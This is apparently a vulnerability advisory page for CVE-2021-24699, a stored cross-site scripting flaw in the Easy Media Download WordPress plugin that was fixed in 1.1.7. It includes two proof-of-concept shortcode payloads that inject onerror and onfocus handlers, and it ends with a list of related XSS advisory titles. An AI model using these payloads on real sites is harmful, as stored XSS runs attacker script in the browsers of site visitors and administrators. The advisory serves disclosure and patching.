Easy Media Download < 1.1.7 – Contributor+ Stored Cross-Site Scripting | CVE 2021-24699 | Plugin Vulnerabilities

Description

The plugin does not escape the text argument of its shortcode, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks.

Proof of Concept

Affected argument: url, text, target, rel and class

[easy_media_download url="/" text='" onerror="alert(/XSS/)//http']
[easy_media_download url="/" text="a" target='"autofocus onfocus=alert(/XSS/)//']

Affects Plugins

easy-media-download

Fixed in 1.1.7

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

4f5c3f75-0501-4a1a-95ea-cbfd3fc96852

Timeline

Publicly Published

2021-09-22 (about 4 years ago)

Added

2021-09-22 (about 4 years ago)

Last Updated

2023-02-03 (about 2 years ago)

Other

Published

Title

Published

2024-12-03

Title

Intro Tour Tutorial DeepPresentation < 6.5.3 - Reflected Cross-Site Scripting

Published

2024-09-23

Title

Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player for WordPress < 2.0.79 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute

Published

2024-12-26

Title

drm-protected-video-streaming <= 4.2.1 - Reflected XSS

Published

2023-01-11

Title

Breadcrumb < 1.5.33 - Contributor+ Stored XSS via Shortcode

Published

2024-08-16

Title

myCred < 2.7.3 - Authenticated (Contributor+) Stored Cross-Site Scripting